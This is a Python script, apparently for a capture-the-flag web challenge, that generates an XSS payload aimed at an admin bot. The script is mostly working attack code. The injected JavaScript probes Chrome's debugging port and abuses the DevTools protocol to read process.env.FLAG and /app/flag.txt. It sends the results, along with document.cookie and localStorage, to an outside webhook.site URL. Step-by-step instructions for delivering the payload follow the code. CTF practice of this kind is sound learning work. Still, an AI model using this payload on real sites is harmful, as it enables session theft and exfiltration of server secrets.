#!/usr/bin/env python3
"""
═══════════════════════════════════════════════════════════════════════════════
                    🎯 QUICK REFERENCE - CDP EXPLOITATION
═══════════════════════════════════════════════════════════════════════════════

WHAT YOU NEED TO KNOW:

1. The --no-sandbox flag enables Chrome DevTools Protocol (CDP) access
2. CDP allows reading process.env and file system from JavaScript
3. The flag is likely in: process.env.FLAG or /app/flag.txt
4. You already have XSS working ✅
5. Now you need to use CDP to read the flag

═══════════════════════════════════════════════════════════════════════════════
🚀 FASTEST PATH TO FLAG
═══════════════════════════════════════════════════════════════════════════════
"""

import urllib.parse

WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# The payload that tries everything at once
exploit_code = f"""
(async () => {{
    const w = '{WEBHOOK}';
    let flag = null;
    
    // Strategy 1: Try remote debugging port
    try {{
        const r = await fetch('http://localhost:9222/json');
        const data = await r.json();
        await fetch(w + '?step=debug_port_open', {{method:'POST', body:JSON.stringify(data)}});
        // TODO: If this works, use CDP over HTTP
    }} catch(e) {{}}
    
    // Strategy 2: Try to import DevTools and use CDP
    try {{
        const Main = await import('/devtools/main/main.js');
        
        // Read process.env.FLAG
        try {{
            const result = await Main.MainImpl.SendOverProtocol('Runtime.evaluate', {{
                expression: 'process.env.FLAG'
            }});
            flag = result.result.value;
            await fetch(w + '?FLAG=' + encodeURIComponent(flag));
        }} catch(e) {{}}
        
        // Try reading file
        if (!flag) {{
            const result = await Main.MainImpl.SendOverProtocol('Runtime.evaluate', {{
                expression: 'require("fs").readFileSync("/app/flag.txt","utf8")'
            }});
            flag = result.result.value;
            await fetch(w + '?FLAG=' + encodeURIComponent(flag));
        }}
    }} catch(e) {{
        await fetch(w + '?error=cdp_import_failed&msg=' + encodeURIComponent(e.toString()));
    }}
    
    // Strategy 3: Check standard locations (probably empty but worth trying)
    if (!flag) {{
        await fetch(w, {{
            method: 'POST',
            body: JSON.stringify({{
                cookie: document.cookie,
                localStorage: {{...localStorage}},
                windowFlag: window.FLAG || window.flag || null
            }})
        }});
    }}
}})();
"""

encoded = urllib.parse.quote(exploit_code.replace('\n', ' '))
payload = f'<form id="errorReporter"><input name="path" value="data:text/javascript,{encoded}"></form><img id="renderConfig" src=x onerror="window.lastRenderError=\'x\';throw new Error()">'

print("═" * 80)
print("STEP 1: Update webhook URL above (line 22)")
print("═" * 80)
print("\nSTEP 2: Copy this payload:")
print("═" * 80)
print(payload)
print("═" * 80)
print("\nSTEP 3: Create a new paste with the payload")
print("═" * 80)
print("\nSTEP 4: Report the paste to the bot")
print("═" * 80)
print("\nSTEP 5: Check your webhook for:")
print("  • 'FLAG=' parameter → You got the flag! 🎉")
print("  • 'debug_port_open' → CDP available via HTTP")
print("  • 'cdp_import_failed' → Try alternative approaches")
print("═" * 80)
print("\nIF CDP DOESN'T WORK:")
print("  1. The bot might not have debugging enabled")
print("  2. Try CDP_EXPLOIT_1_chrome_inspect.py (navigate to chrome://)")
print("  3. The flag might be set differently on remote")
print("  4. Check if bot source differs on actual challenge server")
print("═" * 80)
print("\nREMEMBER:")
print("  • Local FLAG = 'uoftctf{{fake_flag}}'")
print("  • Remote FLAG = actual challenge flag")
print("  • Same exploit works for both!")
print("═" * 80)